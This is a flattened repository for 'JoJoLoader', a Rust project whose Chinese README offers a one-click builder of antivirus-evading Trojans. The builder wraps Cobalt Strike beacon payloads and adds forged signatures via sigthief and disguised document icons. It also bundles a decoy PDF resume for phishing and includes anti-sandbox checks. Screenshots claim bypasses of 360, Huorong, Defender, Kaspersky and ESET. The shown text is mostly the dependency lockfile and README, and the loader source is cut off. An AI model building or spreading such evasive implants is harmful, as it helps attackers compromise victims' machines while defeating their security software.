├── Cargo.lock
├── Cargo.toml
├── README.md
├── build.rs
├── bundle
    └── xxx简历.pdf
├── encrypt.py
├── icon.rc
├── output
    ├── 360Restore.exe
    └── sigthief.py
├── src
    ├── forgery
    │   ├── bundle.rs
    │   ├── mod.rs
    │   └── test.rs
    └── main.rs
├── static
    ├── avp_0000.ico
    ├── excel.ico
    ├── notepad.ico
    ├── pdf.ico
    └── word.ico
└── 一键生成.bat


/Cargo.lock:
--------------------------------------------------------------------------------
  1 | # This file is automatically @generated by Cargo.
  2 | # It is not intended for manual editing.
  3 | version = 3
  4 | 
  5 | [[package]]
  6 | name = "base64"
  7 | version = "0.21.7"
  8 | source = "registry+https://github.com/rust-lang/crates.io-index"
  9 | checksum = "9d297deb1925b89f2ccc13d7635fa0714f12c87adce1c75356b39ca9b7178567"
 10 | 
 11 | [[package]]
 12 | name = "bitflags"
 13 | version = "2.5.0"
 14 | source = "registry+https://github.com/rust-lang/crates.io-index"
 15 | checksum = "cf4b9d6a944f767f8e5e0db018570623c85f3d925ac718db4e06d0187adb21c1"
 16 | 
 17 | [[package]]
 18 | name = "cc"
 19 | version = "1.0.98"
 20 | source = "registry+https://github.com/rust-lang/crates.io-index"
 21 | checksum = "41c270e7540d725e65ac7f1b212ac8ce349719624d7bcff99f8e2e488e8cf03f"
 22 | 
 23 | [[package]]
 24 | name = "cfg-if"
 25 | version = "1.0.0"
 26 | source = "registry+https://github.com/rust-lang/crates.io-index"
 27 | checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
 28 | 
 29 | [[package]]
 30 | name = "core-foundation-sys"
 31 | version = "0.8.6"
 32 | source = "registry+https://github.com/rust-lang/crates.io-index"
 33 | checksum = "06ea2b9bc92be3c2baa9334a323ebca2d6f074ff852cd1d7b11064035cd3868f"
 34 | 
 35 | [[package]]
 36 | name = "crossbeam-deque"
 37 | version = "0.8.5"
 38 | source = "registry+https://github.com/rust-lang/crates.io-index"
 39 | checksum = "613f8cc01fe9cf1a3eb3d7f488fd2fa8388403e97039e2f73692932e291a770d"
 40 | dependencies = [
 41 |  "crossbeam-epoch",
 42 |  "crossbeam-utils",
 43 | ]
 44 | 
 45 | [[package]]
 46 | name = "crossbeam-epoch"
 47 | version = "0.9.18"
 48 | source = "registry+https://github.com/rust-lang/crates.io-index"
 49 | checksum = "5b82ac4a3c2ca9c3460964f020e1402edd5753411d7737aa39c3714ad1b5420e"
 50 | dependencies = [
 51 |  "crossbeam-utils",
 52 | ]
 53 | 
 54 | [[package]]
 55 | name = "crossbeam-utils"
 56 | version = "0.8.20"
 57 | source = "registry+https://github.com/rust-lang/crates.io-index"
 58 | checksum = "22ec99545bb0ed0ea7bb9b8e1e9122ea386ff8a48c0922e43f36d45ab09e0e80"
 59 | 
 60 | [[package]]
 61 | name = "deranged"
 62 | version = "0.3.11"
 63 | source = "registry+https://github.com/rust-lang/crates.io-index"
 64 | checksum = "b42b6fa04a440b495c8b04d0e71b707c585f83cb9cb28cf8cd0d976c315e31b4"
 65 | dependencies = [
 66 |  "powerfmt",
 67 | ]
 68 | 
 69 | [[package]]
 70 | name = "dirs"
 71 | version = "4.0.0"
 72 | source = "registry+https://github.com/rust-lang/crates.io-index"
 73 | checksum = "ca3aa72a6f96ea37bbc5aa912f6788242832f75369bdfdadcb0e38423f100059"
 74 | dependencies = [
 75 |  "dirs-sys",
 76 | ]
 77 | 
 78 | [[package]]
 79 | name = "dirs-sys"
 80 | version = "0.3.7"
 81 | source = "registry+https://github.com/rust-lang/crates.io-index"
 82 | checksum = "1b1d1d91c932ef41c0f2663aa8b0ca0342d444d842c06914aa0a7e352d0bada6"
 83 | dependencies = [
 84 |  "libc",
 85 |  "redox_users",
 86 |  "winapi",
 87 | ]
 88 | 
 89 | [[package]]
 90 | name = "either"
 91 | version = "1.12.0"
 92 | source = "registry+https://github.com/rust-lang/crates.io-index"
 93 | checksum = "3dca9240753cf90908d7e4aac30f630662b02aebaa1b58a3cadabdb23385b58b"
 94 | 
 95 | [[package]]
 96 | name = "embed-resource"
 97 | version = "1.8.0"
 98 | source = "registry+https://github.com/rust-lang/crates.io-index"
 99 | checksum = "e62abb876c07e4754fae5c14cafa77937841f01740637e17d78dc04352f32a5e"
100 | dependencies = [
101 |  "cc",
102 |  "rustc_version",
103 |  "toml",
104 |  "vswhom",
105 |  "winreg 0.10.1",
106 | ]
107 | 
108 | [[package]]
109 | name = "errno"
110 | version = "0.3.9"
111 | source = "registry+https://github.com/rust-lang/crates.io-index"
112 | checksum = "534c5cf6194dfab3db3242765c03bbe257cf92f22b38f6bc0c58d59108a820ba"
113 | dependencies = [
114 |  "libc",
115 |  "windows-sys 0.52.0",
116 | ]
117 | 
118 | [[package]]
119 | name = "fastrand"
120 | version = "2.1.0"
121 | source = "registry+https://github.com/rust-lang/crates.io-index"
122 | checksum = "9fc0510504f03c51ada170672ac806f1f105a88aa97a5281117e1ddc3368e51a"
123 | 
124 | [[package]]
125 | name = "getrandom"
126 | version = "0.2.15"
127 | source = "registry+https://github.com/rust-lang/crates.io-index"
128 | checksum = "c4567c8db10ae91089c99af84c68c38da3ec2f087c3f82960bcdbf3656b6f4d7"
129 | dependencies = [
130 |  "cfg-if",
131 |  "libc",
132 |  "wasi",
133 | ]
134 | 
135 | [[package]]
136 | name = "libc"
137 | version = "0.2.155"
138 | source = "registry+https://github.com/rust-lang/crates.io-index"
139 | checksum = "97b3888a4aecf77e811145cadf6eef5901f4782c53886191b2f693f24761847c"
140 | 
141 | [[package]]
142 | name = "libloading"
143 | version = "0.8.3"
144 | source = "registry+https://github.com/rust-lang/crates.io-index"
145 | checksum = "0c2a198fb6b0eada2a8df47933734e6d35d350665a33a3593d7164fa52c75c19"
146 | dependencies = [
147 |  "cfg-if",
148 |  "windows-targets 0.52.5",
149 | ]
150 | 
151 | [[package]]
152 | name = "libredox"
153 | version = "0.1.3"
154 | source = "registry+https://github.com/rust-lang/crates.io-index"
155 | checksum = "c0ff37bd590ca25063e35af745c343cb7a0271906fb7b37e4813e8f79f00268d"
156 | dependencies = [
157 |  "bitflags",
158 |  "libc",
159 | ]
160 | 
161 | [[package]]
162 | name = "linux-raw-sys"
163 | version = "0.4.14"
164 | source = "registry+https://github.com/rust-lang/crates.io-index"
165 | checksum = "78b3ae25bc7c8c38cec158d1f2757ee79e9b3740fbc7ccf0e59e4b08d793fa89"
166 | 
167 | [[package]]
168 | name = "memmap2"
169 | version = "0.6.2"
170 | source = "registry+https://github.com/rust-lang/crates.io-index"
171 | checksum = "6d28bba84adfe6646737845bc5ebbfa2c08424eb1c37e94a1fd2a82adb56a872"
172 | dependencies = [
173 |  "libc",
174 | ]
175 | 
176 | [[package]]
177 | name = "ntapi"
178 | version = "0.4.1"
179 | source = "registry+https://github.com/rust-lang/crates.io-index"
180 | checksum = "e8a3895c6391c39d7fe7ebc444a87eb2991b2a0bc718fdabd071eec617fc68e4"
181 | dependencies = [
182 |  "winapi",
183 | ]
184 | 
185 | [[package]]
186 | name = "num-conv"
187 | version = "0.1.0"
188 | source = "registry+https://github.com/rust-lang/crates.io-index"
189 | checksum = "51d515d32fb182ee37cda2ccdcb92950d6a3c2893aa280e540671c2cd0f3b1d9"
190 | 
191 | [[package]]
192 | name = "once_cell"
193 | version = "1.19.0"
194 | source = "registry+https://github.com/rust-lang/crates.io-index"
195 | checksum = "3fdb12b2476b595f9358c5161aa467c2438859caa136dec86c26fdd2efe17b92"
196 | 
197 | [[package]]
198 | name = "powerfmt"
199 | version = "0.2.0"
200 | source = "registry+https://github.com/rust-lang/crates.io-index"
201 | checksum = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391"
202 | 
203 | [[package]]
204 | name = "ppv-lite86"
205 | version = "0.2.17"
206 | source = "registry+https://github.com/rust-lang/crates.io-index"
207 | checksum = "5b40af805b3121feab8a3c29f04d8ad262fa8e0561883e7653e024ae4479e6de"
208 | 
209 | [[package]]
210 | name = "proc-macro2"
211 | version = "1.0.85"
212 | source = "registry+https://github.com/rust-lang/crates.io-index"
213 | checksum = "22244ce15aa966053a896d1accb3a6e68469b97c7f33f284b99f0d576879fc23"
214 | dependencies = [
215 |  "unicode-ident",
216 | ]
217 | 
218 | [[package]]
219 | name = "project"
220 | version = "0.1.0"
221 | dependencies = [
222 |  "base64",
223 |  "dirs",
224 |  "embed-resource",
225 |  "libc",
226 |  "libloading",
227 |  "memmap2",
228 |  "rand",
229 |  "sysinfo",
230 |  "tempfile",
231 |  "time",
232 |  "uuid",
233 |  "winapi",
234 |  "windows-sys 0.48.0",
235 |  "winreg 0.52.0",
236 | ]
237 | 
238 | [[package]]
239 | name = "quote"
240 | version = "1.0.36"
241 | source = "registry+https://github.com/rust-lang/crates.io-index"
242 | checksum = "0fa76aaf39101c457836aec0ce2316dbdc3ab723cdda1c6bd4e6ad4208acaca7"
243 | dependencies = [
244 |  "proc-macro2",
245 | ]
246 | 
247 | [[package]]
248 | name = "rand"
249 | version = "0.8.5"
250 | source = "registry+https://github.com/rust-lang/crates.io-index"
251 | checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404"
252 | dependencies = [
253 |  "libc",
254 |  "rand_chacha",
255 |  "rand_core",
256 | ]
257 | 
258 | [[package]]
259 | name = "rand_chacha"
260 | version = "0.3.1"
261 | source = "registry+https://github.com/rust-lang/crates.io-index"
262 | checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88"
263 | dependencies = [
264 |  "ppv-lite86",
265 |  "rand_core",
266 | ]
267 | 
268 | [[package]]
269 | name = "rand_core"
270 | version = "0.6.4"
271 | source = "registry+https://github.com/rust-lang/crates.io-index"
272 | checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c"
273 | dependencies = [
274 |  "getrandom",
275 | ]
276 | 
277 | [[package]]
278 | name = "rayon"
279 | version = "1.10.0"
280 | source = "registry+https://github.com/rust-lang/crates.io-index"
281 | checksum = "b418a60154510ca1a002a752ca9714984e21e4241e804d32555251faf8b78ffa"
282 | dependencies = [
283 |  "either",
284 |  "rayon-core",
285 | ]
286 | 
287 | [[package]]
288 | name = "rayon-core"
289 | version = "1.12.1"
290 | source = "registry+https://github.com/rust-lang/crates.io-index"
291 | checksum = "1465873a3dfdaa8ae7cb14b4383657caab0b3e8a0aa9ae8e04b044854c8dfce2"
292 | dependencies = [
293 |  "crossbeam-deque",
294 |  "crossbeam-utils",
295 | ]
296 | 
297 | [[package]]
298 | name = "redox_users"
299 | version = "0.4.5"
300 | source = "registry+https://github.com/rust-lang/crates.io-index"
301 | checksum = "bd283d9651eeda4b2a83a43c1c91b266c40fd76ecd39a50a8c630ae69dc72891"
302 | dependencies = [
303 |  "getrandom",
304 |  "libredox",
305 |  "thiserror",
306 | ]
307 | 
308 | [[package]]
309 | name = "rustc_version"
310 | version = "0.4.0"
311 | source = "registry+https://github.com/rust-lang/crates.io-index"
312 | checksum = "bfa0f585226d2e68097d4f95d113b15b83a82e819ab25717ec0590d9584ef366"
313 | dependencies = [
314 |  "semver",
315 | ]
316 | 
317 | [[package]]
318 | name = "rustix"
319 | version = "0.38.34"
320 | source = "registry+https://github.com/rust-lang/crates.io-index"
321 | checksum = "70dc5ec042f7a43c4a73241207cecc9873a06d45debb38b329f8541d85c2730f"
322 | dependencies = [
323 |  "bitflags",
324 |  "errno",
325 |  "libc",
326 |  "linux-raw-sys",
327 |  "windows-sys 0.52.0",
328 | ]
329 | 
330 | [[package]]
331 | name = "semver"
332 | version = "1.0.23"
333 | source = "registry+https://github.com/rust-lang/crates.io-index"
334 | checksum = "61697e0a1c7e512e84a621326239844a24d8207b4669b41bc18b32ea5cbf988b"
335 | 
336 | [[package]]
337 | name = "serde"
338 | version = "1.0.203"
339 | source = "registry+https://github.com/rust-lang/crates.io-index"
340 | checksum = "7253ab4de971e72fb7be983802300c30b5a7f0c2e56fab8abfc6a214307c0094"
341 | dependencies = [
342 |  "serde_derive",
343 | ]
344 | 
345 | [[package]]
346 | name = "serde_derive"
347 | version = "1.0.203"
348 | source = "registry+https://github.com/rust-lang/crates.io-index"
349 | checksum = "500cbc0ebeb6f46627f50f3f5811ccf6bf00643be300b4c3eabc0ef55dc5b5ba"
350 | dependencies = [
351 |  "proc-macro2",
352 |  "quote",
353 |  "syn",
354 | ]
355 | 
356 | [[package]]
357 | name = "syn"
358 | version = "2.0.66"
359 | source = "registry+https://github.com/rust-lang/crates.io-index"
360 | checksum = "c42f3f41a2de00b01c0aaad383c5a45241efc8b2d1eda5661812fda5f3cdcff5"
361 | dependencies = [
362 |  "proc-macro2",
363 |  "quote",
364 |  "unicode-ident",
365 | ]
366 | 
367 | [[package]]
368 | name = "sysinfo"
369 | version = "0.29.11"
370 | source = "registry+https://github.com/rust-lang/crates.io-index"
371 | checksum = "cd727fc423c2060f6c92d9534cef765c65a6ed3f428a03d7def74a8c4348e666"
372 | dependencies = [
373 |  "cfg-if",
374 |  "core-foundation-sys",
375 |  "libc",
376 |  "ntapi",
377 |  "once_cell",
378 |  "rayon",
379 |  "winapi",
380 | ]
381 | 
382 | [[package]]
383 | name = "tempfile"
384 | version = "3.10.1"
385 | source = "registry+https://github.com/rust-lang/crates.io-index"
386 | checksum = "85b77fafb263dd9d05cbeac119526425676db3784113aa9295c88498cbf8bff1"
387 | dependencies = [
388 |  "cfg-if",
389 |  "fastrand",
390 |  "rustix",
391 |  "windows-sys 0.52.0",
392 | ]
393 | 
394 | [[package]]
395 | name = "thiserror"
396 | version = "1.0.61"
397 | source = "registry+https://github.com/rust-lang/crates.io-index"
398 | checksum = "c546c80d6be4bc6a00c0f01730c08df82eaa7a7a61f11d656526506112cc1709"
399 | dependencies = [
400 |  "thiserror-impl",
401 | ]
402 | 
403 | [[package]]
404 | name = "thiserror-impl"
405 | version = "1.0.61"
406 | source = "registry+https://github.com/rust-lang/crates.io-index"
407 | checksum = "46c3384250002a6d5af4d114f2845d37b57521033f30d5c3f46c4d70e1197533"
408 | dependencies = [
409 |  "proc-macro2",
410 |  "quote",
411 |  "syn",
412 | ]
413 | 
414 | [[package]]
415 | name = "time"
416 | version = "0.3.36"
417 | source = "registry+https://github.com/rust-lang/crates.io-index"
418 | checksum = "5dfd88e563464686c916c7e46e623e520ddc6d79fa6641390f2e3fa86e83e885"
419 | dependencies = [
420 |  "deranged",
421 |  "num-conv",
422 |  "powerfmt",
423 |  "serde",
424 |  "time-core",
425 | ]
426 | 
427 | [[package]]
428 | name = "time-core"
429 | version = "0.1.2"
430 | source = "registry+https://github.com/rust-lang/crates.io-index"
431 | checksum = "ef927ca75afb808a4d64dd374f00a2adf8d0fcff8e7b184af886c3c87ec4a3f3"
432 | 
433 | [[package]]
434 | name = "toml"
435 | version = "0.5.11"
436 | source = "registry+https://github.com/rust-lang/crates.io-index"
437 | checksum = "f4f7f0dd8d50a853a531c426359045b1998f04219d88799810762cd4ad314234"
438 | dependencies = [
439 |  "serde",
440 | ]
441 | 
442 | [[package]]
443 | name = "unicode-ident"
444 | version = "1.0.12"
445 | source = "registry+https://github.com/rust-lang/crates.io-index"
446 | checksum = "3354b9ac3fae1ff6755cb6db53683adb661634f67557942dea4facebec0fee4b"
447 | 
448 | [[package]]
449 | name = "uuid"
450 | version = "1.8.0"
451 | source = "registry+https://github.com/rust-lang/crates.io-index"
452 | checksum = "a183cf7feeba97b4dd1c0d46788634f6221d87fa961b305bed08c851829efcc0"
453 | dependencies = [
454 |  "getrandom",
455 | ]
456 | 
457 | [[package]]
458 | name = "vswhom"
459 | version = "0.1.0"
460 | source = "registry+https://github.com/rust-lang/crates.io-index"
461 | checksum = "be979b7f07507105799e854203b470ff7c78a1639e330a58f183b5fea574608b"
462 | dependencies = [
463 |  "libc",
464 |  "vswhom-sys",
465 | ]
466 | 
467 | [[package]]
468 | name = "vswhom-sys"
469 | version = "0.1.2"
470 | source = "registry+https://github.com/rust-lang/crates.io-index"
471 | checksum = "d3b17ae1f6c8a2b28506cd96d412eebf83b4a0ff2cbefeeb952f2f9dfa44ba18"
472 | dependencies = [
473 |  "cc",
474 |  "libc",
475 | ]
476 | 
477 | [[package]]
478 | name = "wasi"
479 | version = "0.11.0+wasi-snapshot-preview1"
480 | source = "registry+https://github.com/rust-lang/crates.io-index"
481 | checksum = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423"
482 | 
483 | [[package]]
484 | name = "winapi"
485 | version = "0.3.9"
486 | source = "registry+https://github.com/rust-lang/crates.io-index"
487 | checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419"
488 | dependencies = [
489 |  "winapi-i686-pc-windows-gnu",
490 |  "winapi-x86_64-pc-windows-gnu",
491 | ]
492 | 
493 | [[package]]
494 | name = "winapi-i686-pc-windows-gnu"
495 | version = "0.4.0"
496 | source = "registry+https://github.com/rust-lang/crates.io-index"
497 | checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
498 | 
499 | [[package]]
500 | name = "winapi-x86_64-pc-windows-gnu"
501 | version = "0.4.0"
502 | source = "registry+https://github.com/rust-lang/crates.io-index"
503 | checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
504 | 
505 | [[package]]
506 | name = "windows-sys"
507 | version = "0.48.0"
508 | source = "registry+https://github.com/rust-lang/crates.io-index"
509 | checksum = "677d2418bec65e3338edb076e806bc1ec15693c5d0104683f2efe857f61056a9"
510 | dependencies = [
511 |  "windows-targets 0.48.5",
512 | ]
513 | 
514 | [[package]]
515 | name = "windows-sys"
516 | version = "0.52.0"
517 | source = "registry+https://github.com/rust-lang/crates.io-index"
518 | checksum = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d"
519 | dependencies = [
520 |  "windows-targets 0.52.5",
521 | ]
522 | 
523 | [[package]]
524 | name = "windows-targets"
525 | version = "0.48.5"
526 | source = "registry+https://github.com/rust-lang/crates.io-index"
527 | checksum = "9a2fa6e2155d7247be68c096456083145c183cbbbc2764150dda45a87197940c"
528 | dependencies = [
529 |  "windows_aarch64_gnullvm 0.48.5",
530 |  "windows_aarch64_msvc 0.48.5",
531 |  "windows_i686_gnu 0.48.5",
532 |  "windows_i686_msvc 0.48.5",
533 |  "windows_x86_64_gnu 0.48.5",
534 |  "windows_x86_64_gnullvm 0.48.5",
535 |  "windows_x86_64_msvc 0.48.5",
536 | ]
537 | 
538 | [[package]]
539 | name = "windows-targets"
540 | version = "0.52.5"
541 | source = "registry+https://github.com/rust-lang/crates.io-index"
542 | checksum = "6f0713a46559409d202e70e28227288446bf7841d3211583a4b53e3f6d96e7eb"
543 | dependencies = [
544 |  "windows_aarch64_gnullvm 0.52.5",
545 |  "windows_aarch64_msvc 0.52.5",
546 |  "windows_i686_gnu 0.52.5",
547 |  "windows_i686_gnullvm",
548 |  "windows_i686_msvc 0.52.5",
549 |  "windows_x86_64_gnu 0.52.5",
550 |  "windows_x86_64_gnullvm 0.52.5",
551 |  "windows_x86_64_msvc 0.52.5",
552 | ]
553 | 
554 | [[package]]
555 | name = "windows_aarch64_gnullvm"
556 | version = "0.48.5"
557 | source = "registry+https://github.com/rust-lang/crates.io-index"
558 | checksum = "2b38e32f0abccf9987a4e3079dfb67dcd799fb61361e53e2882c3cbaf0d905d8"
559 | 
560 | [[package]]
561 | name = "windows_aarch64_gnullvm"
562 | version = "0.52.5"
563 | source = "registry+https://github.com/rust-lang/crates.io-index"
564 | checksum = "7088eed71e8b8dda258ecc8bac5fb1153c5cffaf2578fc8ff5d61e23578d3263"
565 | 
566 | [[package]]
567 | name = "windows_aarch64_msvc"
568 | version = "0.48.5"
569 | source = "registry+https://github.com/rust-lang/crates.io-index"
570 | checksum = "dc35310971f3b2dbbf3f0690a219f40e2d9afcf64f9ab7cc1be722937c26b4bc"
571 | 
572 | [[package]]
573 | name = "windows_aarch64_msvc"
574 | version = "0.52.5"
575 | source = "registry+https://github.com/rust-lang/crates.io-index"
576 | checksum = "9985fd1504e250c615ca5f281c3f7a6da76213ebd5ccc9561496568a2752afb6"
577 | 
578 | [[package]]
579 | name = "windows_i686_gnu"
580 | version = "0.48.5"
581 | source = "registry+https://github.com/rust-lang/crates.io-index"
582 | checksum = "a75915e7def60c94dcef72200b9a8e58e5091744960da64ec734a6c6e9b3743e"
583 | 
584 | [[package]]
585 | name = "windows_i686_gnu"
586 | version = "0.52.5"
587 | source = "registry+https://github.com/rust-lang/crates.io-index"
588 | checksum = "88ba073cf16d5372720ec942a8ccbf61626074c6d4dd2e745299726ce8b89670"
589 | 
590 | [[package]]
591 | name = "windows_i686_gnullvm"
592 | version = "0.52.5"
593 | source = "registry+https://github.com/rust-lang/crates.io-index"
594 | checksum = "87f4261229030a858f36b459e748ae97545d6f1ec60e5e0d6a3d32e0dc232ee9"
595 | 
596 | [[package]]
597 | name = "windows_i686_msvc"
598 | version = "0.48.5"
599 | source = "registry+https://github.com/rust-lang/crates.io-index"
600 | checksum = "8f55c233f70c4b27f66c523580f78f1004e8b5a8b659e05a4eb49d4166cca406"
601 | 
602 | [[package]]
603 | name = "windows_i686_msvc"
604 | version = "0.52.5"
605 | source = "registry+https://github.com/rust-lang/crates.io-index"
606 | checksum = "db3c2bf3d13d5b658be73463284eaf12830ac9a26a90c717b7f771dfe97487bf"
607 | 
608 | [[package]]
609 | name = "windows_x86_64_gnu"
610 | version = "0.48.5"
611 | source = "registry+https://github.com/rust-lang/crates.io-index"
612 | checksum = "53d40abd2583d23e4718fddf1ebec84dbff8381c07cae67ff7768bbf19c6718e"
613 | 
614 | [[package]]
615 | name = "windows_x86_64_gnu"
616 | version = "0.52.5"
617 | source = "registry+https://github.com/rust-lang/crates.io-index"
618 | checksum = "4e4246f76bdeff09eb48875a0fd3e2af6aada79d409d33011886d3e1581517d9"
619 | 
620 | [[package]]
621 | name = "windows_x86_64_gnullvm"
622 | version = "0.48.5"
623 | source = "registry+https://github.com/rust-lang/crates.io-index"
624 | checksum = "0b7b52767868a23d5bab768e390dc5f5c55825b6d30b86c844ff2dc7414044cc"
625 | 
626 | [[package]]
627 | name = "windows_x86_64_gnullvm"
628 | version = "0.52.5"
629 | source = "registry+https://github.com/rust-lang/crates.io-index"
630 | checksum = "852298e482cd67c356ddd9570386e2862b5673c85bd5f88df9ab6802b334c596"
631 | 
632 | [[package]]
633 | name = "windows_x86_64_msvc"
634 | version = "0.48.5"
635 | source = "registry+https://github.com/rust-lang/crates.io-index"
636 | checksum = "ed94fce61571a4006852b7389a063ab983c02eb1bb37b47f8272ce92d06d9538"
637 | 
638 | [[package]]
639 | name = "windows_x86_64_msvc"
640 | version = "0.52.5"
641 | source = "registry+https://github.com/rust-lang/crates.io-index"
642 | checksum = "bec47e5bfd1bff0eeaf6d8b485cc1074891a197ab4225d504cb7a1ab88b02bf0"
643 | 
644 | [[package]]
645 | name = "winreg"
646 | version = "0.10.1"
647 | source = "registry+https://github.com/rust-lang/crates.io-index"
648 | checksum = "80d0f4e272c85def139476380b12f9ac60926689dd2e01d4923222f40580869d"
649 | dependencies = [
650 |  "winapi",
651 | ]
652 | 
653 | [[package]]
654 | name = "winreg"
655 | version = "0.52.0"
656 | source = "registry+https://github.com/rust-lang/crates.io-index"
657 | checksum = "a277a57398d4bfa075df44f501a17cfdf8542d224f0d36095a2adc7aee4ef0a5"
658 | dependencies = [
659 |  "cfg-if",
660 |  "windows-sys 0.48.0",
661 | ]
662 | 


--------------------------------------------------------------------------------
/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "project"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | 
 6 | [dependencies]
 7 | tempfile = "3.10.1"
 8 | rand= "0.8.5"
 9 | base64 = "0.21.5"
10 | winapi = { version = "0.3.9", features = ["winhttp", "winuser", "memoryapi", "synchapi", "handleapi", "errhandlingapi", "processthreadsapi", "debugapi", "sysinfoapi", "fileapi", "winbase", "iphlpapi", "ntdef", "ifdef", "winsock2", "iptypes", "ws2def", "processenv","debugapi"] }
11 | windows-sys = { version = "0.48.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_System_LibraryLoader"] }
12 | time = "0.3.30"
13 | sysinfo = "0.29.11"
14 | winreg = "0.52.0"
15 | libloading ="0.8.3"
16 | uuid = { version = "1.0", features = ["v4"] }
17 | libc = "0.2"
18 | memmap2 = "0.6.1"
19 | dirs = "4.0"
20 | 
21 | [build-dependencies]
22 | embed-resource = "1.8.0"
23 | 
24 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | ![JoJoLoader](https://github.com/Pizz33/JoJoLoader/assets/88339946/dd259365-7334-43df-aee5-2d53d39c0fa9)
  2 | 
  3 | # JoJoLoader
  4 | 
  5 | 助力红队成员一键生成免杀木马，使用rust实现 (by_hyyrent)
  6 | 
  7 | Help Redteam members generate Evasive Anti-virus software Trojan
  8 | 
  9 | 更新说明
 10 | ---
 11 | 2024/08/07 优化免杀效果：360全家桶✔ 火绒✔ def✔ （病毒库最新）
 12 | 
 13 | ![image](https://github.com/user-attachments/assets/1708a617-5d70-47d5-8fae-da0b92399f10)
 14 | 
 15 | 开发背景
 16 | ---
 17 | 
 18 | 由于近年使用go来开发loader越来越普遍，导致杀软对go编译程序静态查杀力度增大，尤其是某数字杀软
 19 | 
 20 | 对之前的go免杀项目千机多次优化后，发现效果仍不太理想，决定重构转投入rust的怀抱，因此有了此项目的诞生！
 21 | 
 22 | 使用方式
 23 | ---
 24 | 
 25 | 与之前开发的千机一样，同样是支持一键化生成，生成自动替换图标签名
 26 | 
 27 | 生成`stageless payload`
 28 | 
 29 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/49ddd939-32c3-495f-8ab7-a6f649a3a138)
 30 | 
 31 | 把 `beacon_x64.bin` （习惯使用4.7以上版本的CS，默认名称即是，其他版本自行改名）放置在当前目录下
 32 | 
 33 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/294efecb-b0bf-45cc-afac-7a107cac3b14)
 34 | 
 35 | 点击 `一键生成.bat`，等待免杀木马生成
 36 | 
 37 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/6ad29be8-7a42-4348-8606-113caee887f0)
 38 | 
 39 | 输出免杀木马在 `output` 文件夹下，随机六位数命名
 40 | 
 41 | 其中sign标签文件为自动替换签名后的免杀木马，添加图标和签名最大化bypassQVM
 42 | 
 43 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/7b30c675-acb4-40ae-9045-1d92afbc97b7)
 44 | 
 45 | 钓鱼场景-释放正常文档
 46 | ---
 47 | 
 48 | 贴合实战钓鱼场景，支持正常文件释放，捆绑文档存放在 `bundle` 文件夹下
 49 | 
 50 | 默认放置打开损坏文档，实战根据需求自行修改代码
 51 | 
 52 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/4ca87739-3dfc-4a07-bda0-0cf5b0c90505)
 53 | 
 54 | 如果不需要捆绑文件，把对应行注释即可
 55 | 
 56 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/7b5b4ed6-5f7f-431c-9502-be82a31dd74b)
 57 | 
 58 | 程序图标
 59 | ---
 60 | 
 61 | 在 static 目录下放置了四个常见图标，可修改`icon.rc`对应名称进行调用
 62 | 
 63 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/9480ea64-e78f-4ce3-bda7-a2a6bc451688)
 64 | 
 65 | 免杀效果展示
 66 | ---
 67 | **360和火绒**
 68 | 
 69 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/b6fb7409-4560-493c-bf2e-a3198837ca70)
 70 | 
 71 | **360杀毒**
 72 | 
 73 | 装了杀毒之后的360性能变强，qvm有时很玄学，如若碰到QVM情况尝试更换图标
 74 | 
 75 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/bfc2da65-49e7-4a97-bb83-9c0420edb034)
 76 | 
 77 | **defender**
 78 | 
 79 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/f6c49329-8cd9-48d7-af33-130fa165c3ee)
 80 | 
 81 | **微步**
 82 | 
 83 | 项目发布时现测试，测试结果为安全
 84 | 
 85 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/1ebe6cba-b85e-4964-843a-1f54a279f591)
 86 | 
 87 | 卡巴斯基 ESET
 88 | 
 89 | 国外edr会扫描内存，需要对bin进行二开，单靠loader局限性很大，以下测试是基于二开的bin
 90 | 
 91 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/f5c66ab3-9034-49af-b01d-a7bc4bf12fc7)
 92 | 
 93 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/5ce2e534-d1cb-4865-898b-6187dbf84d3d)
 94 | 
 95 | 环境安装
 96 | ---
 97 | https://www.rust-lang.org/zh-CN/tools/install
 98 | 
 99 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/a1b8b73a-5545-4797-b2d3-b2605640b7a7)
100 | 
101 | 下载安装相应的版本，双击运行，默认选择模式1进行安装，然后配置环境变量即可
102 | 
103 | ![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/bb0a690c-1703-4b49-8b43-20b70de024a8)
104 | 
105 | 如若安装后编译失败运行以下命令
106 | 
107 | ```
108 | rustup default stable-x86_64-pc-windows-msvc
109 | ```
110 | 
111 | 反沙箱
112 | ---
113 | 反沙箱不是越多越好，只保留比较好用的三个，兼容绝大部分环境，并且尽量避免上传沙箱后虚拟主机上线
114 | 
115 | ### 流速检测 ###
116 | 
117 | ```
118 | pub fn flow_time() {
